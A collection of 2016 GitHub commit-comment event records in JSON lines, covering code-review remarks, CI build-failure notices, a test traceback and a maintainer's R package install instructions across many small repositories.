{"id":"4641274892","type":"CommitCommentEvent","actor":{"login":"LarryAsante"},"repo":{"name":"GrinnellAppDev/Lyles-Android"},"payload":{"comment":{"id":19235835,"position":43,"line":49,"path":"app/src/main/java/grinnell/appdev/edu/lyles/fragments/MenuFragment.java","commit_id":"d60ee7a661bb471c375a8c00cde122cda9fffafa","created_at":"2016-09-30T03:33:20Z","updated_at":"2016-09-30T03:33:20Z","body":"nit: Please fix the formatting here. Use proper level indentation so you're not forcing methods on just one line. See the code guidelines for details "}},"created_at":"2016-09-30T03:33:20Z"}
{"id":"4641275088","type":"CommitCommentEvent","actor":{"login":"guokai8"},"repo":{"name":"tomlof/OnPLS"},"payload":{"comment":{"id":19235836,"position":null,"line":null,"path":null,"commit_id":"572fbcf7137f6e08dd6b63531405131fe70a1cc0","created_at":"2016-09-30T03:33:25Z","updated_at":"2016-09-30T03:33:25Z","body":"Still report failed even I changed it to 5e-6\r\n```\r\nTraceback (most recent call last):\r\n  File \"/Users/bioguo/Desktop/OnPLS/tests/test_OnPLS.py\", line 86, in test_comparison_to_nPLS\r\n    assert(np.linalg.norm(Xhat[0] - np.dot(t, p3.T)) < 5e-6)\r\n```\r\nHere is my system information\r\n```\r\nPython 2.7.9 | 64-bit | (default, Jun 30 2015, 19:41:21) \r\n15.6.0 Darwin Kernel Version 15.6.0:\r\n```"}},"created_at":"2016-09-30T03:33:25Z"}
{"id":"4641275538","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235837,"position":2,"line":2,"path":"dbTest/dbExp.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:33:35Z","updated_at":"2016-09-30T03:33:35Z","body":"Can you just comment out my config lines, rather than deleting them, until I get server config files figured out? That way I won't have to remember and re-add my stuff each time, which lets me be a little lazier. :P"}},"created_at":"2016-09-30T03:33:35Z"}
{"id":"4641276214","type":"CommitCommentEvent","actor":{"login":"Hevienz"},"repo":{"name":"Hevienz/raft-zh_cn"},"payload":{"comment":{"id":19235838,"position":null,"line":null,"path":null,"commit_id":"2a667e7b37696b835f05bb4feaef689f01184d3b","created_at":"2016-09-30T03:33:50Z","updated_at":"2016-09-30T03:33:50Z","body":"这里的意思是leader会初始化所有的nextIndex值为它最后一条日志的后面的index。"}},"created_at":"2016-09-30T03:33:50Z"}
{"id":"4641277155","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235839,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:34:13Z","updated_at":"2016-09-30T03:34:13Z","body":"CCommsLink or CommsLink?"}},"created_at":"2016-09-30T03:34:13Z"}
{"id":"4641280493","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235848,"position":null,"line":null,"path":null,"commit_id":"243bd5313e97f75fc878314c2cc1b2b11b2a0677","created_at":"2016-09-30T03:35:37Z","updated_at":"2016-09-30T03:35:37Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T03:35:37Z"}
{"id":"4641282630","type":"CommitCommentEvent","actor":{"login":"tushar5"},"repo":{"name":"tushar5/tushar5.github.io"},"payload":{"comment":{"id":19235854,"position":null,"line":null,"path":null,"commit_id":"ff4fda49b61bbacf2385733428af34a43ee50d72","created_at":"2016-09-30T03:36:25Z","updated_at":"2016-09-30T03:36:25Z","body":"m"}},"created_at":"2016-09-30T03:36:25Z"}
{"id":"4641283066","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235855,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:36:37Z","updated_at":"2016-09-30T03:36:37Z","body":"Lol you coppied my probably wont work that was reference to the rxLength reference conversion to UInt32%"}},"created_at":"2016-09-30T03:36:37Z"}
{"id":"4641285978","type":"CommitCommentEvent","actor":{"login":"emasad"},"repo":{"name":"emasad/BitBook"},"payload":{"comment":{"id":19235859,"position":null,"line":null,"path":null,"commit_id":"5b97e4cd79b8d9a10f1aa305a7f36a9e9888e866","created_at":"2016-09-30T03:37:48Z","updated_at":"2016-09-30T03:37:48Z","body":"this is Deleted"}},"created_at":"2016-09-30T03:37:48Z"}
{"id":"4641286265","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235860,"position":1,"line":1,"path":"dbTest/formats/rep_DogSit.html","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:37:56Z","updated_at":"2016-09-30T03:37:56Z","body":"Is this an example of the sort of responses we will see? Or of the sort of output we should generate? My guess is the latter, but if you could put comments at the top of new documents specifying what they're for (documentation comments), it really helps with readability and maintainability. Again, this depends on how serious you want to be about the project/how long you intend to maintain the site."}},"created_at":"2016-09-30T03:37:56Z"}
{"id":"4641287284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235862,"position":null,"line":null,"path":null,"commit_id":"243bd5313e97f75fc878314c2cc1b2b11b2a0677","created_at":"2016-09-30T03:38:23Z","updated_at":"2016-09-30T03:38:23Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-30T03:38:23Z"}
{"id":"4641287349","type":"CommitCommentEvent","actor":{"login":"vamsykv"},"repo":{"name":"kvamsy21/Testing"},"payload":{"comment":{"id":19235863,"position":2,"line":2,"path":"arc2","commit_id":"b28124efd432f37e7c17d153ed07e063af7007f6","created_at":"2016-09-30T03:38:24Z","updated_at":"2016-09-30T03:38:24Z","body":"fetch option verification\r\nfetch option verification"}},"created_at":"2016-09-30T03:38:24Z"}
{"id":"4641287872","type":"CommitCommentEvent","actor":{"login":"Azimahak"},"repo":{"name":"ropensci/rplos"},"payload":{"comment":{"id":19235864,"position":22,"line":55,"path":"README.Rmd","commit_id":"c4aee7928246656ec45d20890df948e5c8e2c02d","created_at":"2016-09-30T03:38:39Z","updated_at":"2016-09-30T03:38:39Z","body":"Hi, I just learned about rplos but i do not know how to install it in github. is there an exe file which i can download? tq"}},"created_at":"2016-09-30T03:38:39Z"}
{"id":"4641287878","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235865,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:38:39Z","updated_at":"2016-09-30T03:38:39Z","body":"What won't work?\r\n"}},"created_at":"2016-09-30T03:38:39Z"}
{"id":"4641288020","type":"CommitCommentEvent","actor":{"login":"lammn"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19235868,"position":null,"line":null,"path":null,"commit_id":"b3aa3dedb1c5c54e9c917726865dec20bc0679f0","created_at":"2016-09-30T03:38:43Z","updated_at":"2016-09-30T03:38:43Z","body":"Change back button name from 戻る =>検索画面に戻る"}},"created_at":"2016-09-30T03:38:43Z"}
{"id":"4641291278","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235872,"position":63,"line":63,"path":"dbTest/formats/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:40:03Z","updated_at":"2016-09-30T03:40:03Z","body":"This defaults to visible, until \"no\" is selected."}},"created_at":"2016-09-30T03:40:03Z"}
{"id":"4641293492","type":"CommitCommentEvent","actor":{"login":"MichaelWallace30"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235875,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:40:57Z","updated_at":"2016-09-30T03:40:57Z","body":"CUDPLink.cpp. line 50 comment refered to UInt32% you fixed it, but left my comment. Just tjought it was funny."}},"created_at":"2016-09-30T03:40:57Z"}
{"id":"4641294009","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235876,"position":null,"line":null,"path":null,"commit_id":"243bd5313e97f75fc878314c2cc1b2b11b2a0677","created_at":"2016-09-30T03:41:09Z","updated_at":"2016-09-30T03:41:09Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-243bd5313e97f75fc878314c2cc1b2b11b2a0677-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a>  \n"}},"created_at":"2016-09-30T03:41:09Z"}
{"id":"4641296534","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235881,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:42:16Z","updated_at":"2016-09-30T03:42:16Z","body":"Lulz, I didn't even bother to change the comments."}},"created_at":"2016-09-30T03:42:16Z"}
{"id":"4641296823","type":"CommitCommentEvent","actor":{"login":"sckott"},"repo":{"name":"ropensci/rplos"},"payload":{"comment":{"id":19235882,"position":22,"line":55,"path":"README.Rmd","commit_id":"c4aee7928246656ec45d20890df948e5c8e2c02d","created_at":"2016-09-30T03:42:21Z","updated_at":"2016-09-30T03:42:21Z","body":"Hi! Thanks for the question. You can install it by doing\r\n\r\n```r\r\nif (!requireNamespace(\"devtools\")) {\r\n   install.packages(\"devtools\")\r\n}\r\ndevtools::install_github(\"ropensci/rplos\")\r\n```"}},"created_at":"2016-09-30T03:42:21Z"}
{"id":"4641298204","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235884,"position":1,"line":1,"path":"dbTest/forms/rep_DogSit.html","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:42:59Z","updated_at":"2016-09-30T03:42:59Z","body":"Is there a reason there's a /forms/ and a /formats/ version of this file?"}},"created_at":"2016-09-30T03:42:59Z"}
{"id":"4641298490","type":"CommitCommentEvent","actor":{"login":"Mustamil"},"repo":{"name":"Mustamil/hello-word"},"payload":{"comment":{"id":19235885,"position":null,"line":null,"path":null,"commit_id":"cc0613d5a9ce40265babd94138a43defffc3203f","created_at":"2016-09-30T03:43:06Z","updated_at":"2016-09-30T03:43:06Z","body":"#Hello Word\r\nMustamil\r\n311421208\r\nTI 14 B 4\r\n"}},"created_at":"2016-09-30T03:43:06Z"}
{"id":"4641298501","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235886,"position":25,"line":25,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:43:06Z","updated_at":"2016-09-30T03:43:06Z","body":"嗯，如果只是自己使用确保会传len，则不需要\r\n"}},"created_at":"2016-09-30T03:43:06Z"}
{"id":"4641299293","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235888,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:43:27Z","updated_at":"2016-09-30T03:43:27Z","body":"CComms can work now. All we really need to do is implement Xbee into both native and managed Comms"}},"created_at":"2016-09-30T03:43:27Z"}
{"id":"4641299699","type":"CommitCommentEvent","actor":{"login":"Azimahak"},"repo":{"name":"ropensci/rplos"},"payload":{"comment":{"id":19235889,"position":22,"line":55,"path":"README.Rmd","commit_id":"c4aee7928246656ec45d20890df948e5c8e2c02d","created_at":"2016-09-30T03:43:39Z","updated_at":"2016-09-30T03:43:39Z","body":"Hi Scott,\r\n\r\nThis is new for me. I will try it. Thank you\r\n\r\n\r\n\r\nFrom: Scott Chamberlain [mailto:notifications@github.com]\r\nSent: Friday, September 30, 2016 11:42 AM\r\nTo: ropensci/rplos\r\nCc: Azimah Abdul Kadir; Comment\r\nSubject: Re: [ropensci/rplos] use canonical urls for cran in readme (c4aee79)\r\n\r\n\r\nHi! Thanks for the question. You can install it by doing\r\n\r\nif (!requireNamespace(\"devtools\")) {\r\n\r\n   install.packages(\"devtools\")\r\n\r\n}\r\n\r\ndevtools::install_github(\"ropensci/rplos\")\r\n\r\n—\r\nYou are receiving this because you commented.\r\nReply to this email directly, view it on GitHub<https://github.com/ropensci/rplos/commit/c4aee7928246656ec45d20890df948e5c8e2c02d#commitcomment-19235882>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AVZmwCzBXYtWs_f25OKmhjS8P10o4nqGks5qvIUggaJpZM4KKslG>.\r\n\r\n________________________________\r\nDISCLAIMER:\r\n\r\n\r\nThis e-mail (including any attachments) is for the addressee(s) only and may be confidential, especially as regards personal data. If you are not the intended recipient, please note that any dealing, review, distribution, printing, copying or use of this e-mail is strictly prohibited. If you have received this email in error, please notify the sender immediately and delete the original message (including any attachments).\r\n\r\nMIMOS Berhad is a research and development institution under the purview of the Malaysian Ministry of Science, Technology and Innovation. Opinions, conclusions and other information in this e-mail that do not relate to the official business of MIMOS Berhad and/or its subsidiaries shall be understood as neither given nor endorsed by MIMOS Berhad and/or its subsidiaries and neither MIMOS Berhad nor its subsidiaries accepts responsibility for the same. All liability arising from or in connection with computer viruses and/or corrupted e-mails is excluded to the fullest extent permitted by law.\r\n"}},"created_at":"2016-09-30T03:43:39Z"}
{"id":"4641299713","type":"CommitCommentEvent","actor":{"login":"CheezBoiger"},"repo":{"name":"MichaelWallace30/CommProtocol"},"payload":{"comment":{"id":19235890,"position":null,"line":null,"path":null,"commit_id":"b12826009c88fcc6708369ba90f9fe9eebcabc47","created_at":"2016-09-30T03:43:39Z","updated_at":"2016-09-30T03:43:39Z","body":"After that, the rest is left up to improving the library."}},"created_at":"2016-09-30T03:43:39Z"}
{"id":"4641300638","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235891,"position":144,"line":144,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:44:02Z","updated_at":"2016-09-30T03:44:02Z","body":"这个是内部函数啊"}},"created_at":"2016-09-30T03:44:02Z"}
{"id":"4641301853","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19235895,"position":null,"line":null,"path":null,"commit_id":"288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2","created_at":"2016-09-30T03:44:34Z","updated_at":"2016-09-30T03:44:34Z","body":"EMS (brianlball) - Win64-Windows-7-VisualStudio-12: Tests Failed (1948 of 2497 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-288cdb9740fccb6e33a7ae5520dc0b15bb4bf1f2-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-78.01%25-red.svg)</a> \n"}},"created_at":"2016-09-30T03:44:34Z"}
{"id":"4641303422","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235898,"position":23,"line":23,"path":"dbTest/forms/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:45:14Z","updated_at":"2016-09-30T03:45:14Z","body":"What do these parentheses do? Are they for debugging purposes?"}},"created_at":"2016-09-30T03:45:14Z"}
{"id":"4641303831","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235899,"position":152,"line":152,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:45:24Z","updated_at":"2016-09-30T03:45:24Z","body":"它是一个set方法啊～ 是说要return 再赋值会好点吗？"}},"created_at":"2016-09-30T03:45:24Z"}
{"id":"4641307179","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235902,"position":28,"line":28,"path":"dbTest/forms/rep_DogSit.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:46:57Z","updated_at":"2016-09-30T03:46:57Z","body":"Is this setting up for an AJAX call? At some point we should move AJAX .php files somewhere that the server won't serve them, to avoid people GET-ing them directly."}},"created_at":"2016-09-30T03:46:57Z"}
{"id":"4641309069","type":"CommitCommentEvent","actor":{"login":"Armok628"},"repo":{"name":"Armok628/rogue-test"},"payload":{"comment":{"id":19235908,"position":null,"line":null,"path":null,"commit_id":"432451ca68ce001f75c60b38baacd26ff359b6f9","created_at":"2016-09-30T03:47:51Z","updated_at":"2016-09-30T03:47:51Z","body":"Also removed some deprecated (and commented-out) functions"}},"created_at":"2016-09-30T03:47:51Z"}
{"id":"4641309602","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235911,"position":164,"line":164,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:48:06Z","updated_at":"2016-09-30T03:48:06Z","body":"封到一个对象里，是为了扩展性更好吧，可能未来还会有其他参数呢？这也是一个习惯～在优供里，习惯将currentTab这种的参数封到opts中（具体说哪种也说不清，好像是感觉 😳）"}},"created_at":"2016-09-30T03:48:06Z"}
{"id":"4641310389","type":"CommitCommentEvent","actor":{"login":"dapengzhang0"},"repo":{"name":"dapengzhang0/grpc-java"},"payload":{"comment":{"id":19235913,"position":26,"line":281,"path":"core/src/main/java/io/grpc/internal/TransportSet.java","commit_id":"93e090492fa12dfa8d2a67511862fb4ccccbe4d7","created_at":"2016-09-30T03:48:27Z","updated_at":"2016-09-30T03:48:27Z","body":"precondition.checkState"}},"created_at":"2016-09-30T03:48:27Z"}
{"id":"4641310626","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235915,"position":186,"line":186,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:48:33Z","updated_at":"2016-09-30T03:48:33Z","body":"作为一个set方法，不需要return吧"}},"created_at":"2016-09-30T03:48:33Z"}
{"id":"4641311094","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235916,"position":1,"line":1,"path":"dbTest/forms/tablemaker.php","commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:48:46Z","updated_at":"2016-09-30T03:48:46Z","body":"I'm confused by this file. You're creating a new table, but reactively? And with reactive column naming? It looks like you're trying to store the responses to the forms submissions, but I'm pretty sure there's a better way to do this.\r\nAnd why does it echo that \"MyGuests\" was created successfully when creating Rep_DogSit?"}},"created_at":"2016-09-30T03:48:46Z"}
{"id":"4641313732","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19235920,"position":null,"line":null,"path":null,"commit_id":"9f8f696fece8272ef3af9a30fabdc75646c84406","created_at":"2016-09-30T03:49:57Z","updated_at":"2016-09-30T03:49:57Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[FT-015] Changes of stored stream trigger update event](https://trello.com/c/mL3Eu1xn/21-ft-015-changes-of-stored-stream-trigger-update-event)"}},"created_at":"2016-09-30T03:49:57Z"}
{"id":"4641314446","type":"CommitCommentEvent","actor":{"login":"Wanke15"},"repo":{"name":"Wanke15/-TIN"},"payload":{"comment":{"id":19235921,"position":null,"line":null,"path":null,"commit_id":"a2e701a5ea909cf17aad8ca9f6e5f7a3558d8d06","created_at":"2016-09-30T03:50:16Z","updated_at":"2016-09-30T03:50:16Z","body":"取消程序计时"}},"created_at":"2016-09-30T03:50:16Z"}
{"id":"4641314472","type":"CommitCommentEvent","actor":{"login":"hlee"},"repo":{"name":"dchbx/enroll"},"payload":{"comment":{"id":19235923,"position":4,"line":76,"path":"app/models/hbx_enrollment.rb","commit_id":"46e180718f88df9f6132627e4cc4860e3efe9c50","created_at":"2016-09-30T03:50:16Z","updated_at":"2016-09-30T03:50:16Z","body":"@Kevin-Wei  hard to locate this line"}},"created_at":"2016-09-30T03:50:16Z"}
{"id":"4641315637","type":"CommitCommentEvent","actor":{"login":"SethBorder"},"repo":{"name":"SethBorder/ServiceDogsOfVirginiaDogLocationRecords"},"payload":{"comment":{"id":19235928,"position":null,"line":null,"path":null,"commit_id":"264e6280d923f56c0efd44b65576003d3edaf602","created_at":"2016-09-30T03:50:47Z","updated_at":"2016-09-30T03:50:47Z","body":"Sorry for all the comments, hope you don't mind. Don't feel obliged to respond to all of them, though it would be helpful to me if you do. I'm just trying to provide feedback on style/back-end coding and asking for clarification where I'm not sure about things.\r\nAlso, just for future reference, if something is not finished, it's nice if you comment it as such. You can also use comments of the form:\r\n//TODO(gabe): Fix foo by removing bar.\r\nTo show where there are pieces you intend to add later."}},"created_at":"2016-09-30T03:50:47Z"}
{"id":"4641317655","type":"CommitCommentEvent","actor":{"login":"joaolucassm"},"repo":{"name":"sousabraga/SistemaOlimpiadas"},"payload":{"comment":{"id":19235930,"position":2,"line":202,"path":"src/java/br/estacio/sistemaolimpiada/dao/PaisDAO.java","commit_id":"a8573314995de2b836364297ac109ae3a169c434","created_at":"2016-09-30T03:51:42Z","updated_at":"2016-09-30T03:51:42Z","body":"Se um país ganhasse mais de uma medalha em um esporte, isso não geraria uma tabela com códigos de esporte repetidos na subconsulta? "}},"created_at":"2016-09-30T03:51:42Z"}
{"id":"4641320262","type":"CommitCommentEvent","actor":{"login":"dingding231"},"repo":{"name":"Addisonbean/Beowulf"},"payload":{"comment":{"id":19235939,"position":4,"line":47,"path":"js/all_maps.js","commit_id":"60c80409613df46bc4f2db8f6b4d5b3c87e3f4cf","created_at":"2016-09-30T03:52:51Z","updated_at":"2016-09-30T03:52:51Z","body":"This guy is just another image of the person, but he has the functionality of a poison item (which doesn't actually do anything at the moment). Probably should have commented this out but whatever"}},"created_at":"2016-09-30T03:52:51Z"}
{"id":"4641321686","type":"CommitCommentEvent","actor":{"login":"IFuentesSR"},"repo":{"name":"IFuentesSR/MAR"},"payload":{"comment":{"id":19235944,"position":59,"line":38,"path":"README.md","commit_id":"3d10e6b4d41d25d5bb216d33df956358dd9eec70","created_at":"2016-09-30T03:53:31Z","updated_at":"2016-09-30T03:53:31Z","body":"Remove for a linear xscale "}},"created_at":"2016-09-30T03:53:31Z"}
{"id":"4641321765","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235945,"position":335,"line":335,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:53:33Z","updated_at":"2016-09-30T03:53:33Z","body":"oh 改的时候没注意😳😳😳"}},"created_at":"2016-09-30T03:53:33Z"}
{"id":"4641322603","type":"CommitCommentEvent","actor":{"login":"IFuentesSR"},"repo":{"name":"IFuentesSR/MAR"},"payload":{"comment":{"id":19235948,"position":61,"line":30,"path":"README.md","commit_id":"3d10e6b4d41d25d5bb216d33df956358dd9eec70","created_at":"2016-09-30T03:53:56Z","updated_at":"2016-09-30T03:53:56Z","body":"remove for a linear xscale"}},"created_at":"2016-09-30T03:53:56Z"}
{"id":"4641323953","type":"CommitCommentEvent","actor":{"login":"macedir"},"repo":{"name":"macedir/School"},"payload":{"comment":{"id":19235951,"position":null,"line":null,"path":null,"commit_id":"ea2a2bdfb37e78a74bf05667c783866f9cde7740","created_at":"2016-09-30T03:54:30Z","updated_at":"2016-09-30T03:54:30Z","body":"I also renamed function variables to make reading clearer."}},"created_at":"2016-09-30T03:54:30Z"}
{"id":"4641325445","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19235955,"position":4,"line":3253,"path":"html/template/default/css/style.css","commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T03:55:10Z","updated_at":"2016-09-30T03:55:10Z","body":"Why did you add this?"}},"created_at":"2016-09-30T03:55:10Z"}
{"id":"4641325593","type":"CommitCommentEvent","actor":{"login":"nanosoldier"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":19235956,"position":null,"line":null,"path":null,"commit_id":"b36141f4799d73113b3597ee94d5925929b2ccd5","created_at":"2016-09-30T03:55:14Z","updated_at":"2016-09-30T03:55:14Z","body":"Executing the daily benchmark build, I will reply here when finished:\n\n@nanosoldier `runbenchmarks(ALL, isdaily = true)`\n"}},"created_at":"2016-09-30T03:55:14Z"}
{"id":"4641326264","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235958,"position":317,"line":317,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:55:31Z","updated_at":"2016-09-30T03:55:31Z","body":"嗯嗯，确实～"}},"created_at":"2016-09-30T03:55:31Z"}
{"id":"4641326865","type":"CommitCommentEvent","actor":{"login":"lqdung-lockon"},"repo":{"name":"eccubevn/ec-cube"},"payload":{"comment":{"id":19235959,"position":4,"line":120,"path":"tests/Eccube/Tests/Web/Mypage/DeliveryControllerTest.php","commit_id":"eef86ef72ea7fb759d8205b1e05c8157192730d0","created_at":"2016-09-30T03:55:47Z","updated_at":"2016-09-30T03:55:47Z","body":"-\tShould use:\r\n$crawler = $client->followRedirect();\r\n"}},"created_at":"2016-09-30T03:55:47Z"}
{"id":"4641328097","type":"CommitCommentEvent","actor":{"login":"LeeTheCoder"},"repo":{"name":"LeeTheCoder/medic_kiosk"},"payload":{"comment":{"id":19235961,"position":null,"line":null,"path":null,"commit_id":"973b74d2a15dbb844dec4edc6ed6ee132cedfede","created_at":"2016-09-30T03:56:23Z","updated_at":"2016-09-30T03:56:23Z","body":"Also removed a lot of code I just commented out for a later date."}},"created_at":"2016-09-30T03:56:23Z"}
{"id":"4641328866","type":"CommitCommentEvent","actor":{"login":"brambledn"},"repo":{"name":"lianshang/code-review-fe"},"payload":{"comment":{"id":19235963,"position":443,"line":443,"path":"madanni/coupon/coupon.js","commit_id":"552d837b334b32130a50db389e5ceee1a66f0f37","created_at":"2016-09-30T03:56:45Z","updated_at":"2016-09-30T03:56:45Z","body":"我的想法是events下定义的事件才加了act😳"}},"created_at":"2016-09-30T03:56:45Z"}
{"id":"4641331603","type":"CommitCommentEvent","actor":{"login":"hazeFlame"},"repo":{"name":"jschr/textillate"},"payload":{"comment":{"id":19235965,"position":45,"line":226,"path":"index.html","commit_id":"e34a9938c51f2e29cc4357720dd72cabf905b35f","created_at":"2016-09-30T03:58:00Z","updated_at":"2016-09-30T03:58:00Z","body":"sadasd"}},"created_at":"2016-09-30T03:58:00Z"}
{"id":"4641332370","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"robertohuertasm/vscode-icons"},"payload":{"comment":{"id":19235966,"position":null,"line":null,"path":null,"commit_id":"18c145ed76852c7ddc5ef27d665d629d2edfc143","created_at":"2016-09-30T03:58:20Z","updated_at":"2016-09-30T03:58:20Z","body":"@Nooknok Hm? Is there a problem? 😅 "}},"created_at":"2016-09-30T03:58:20Z"}
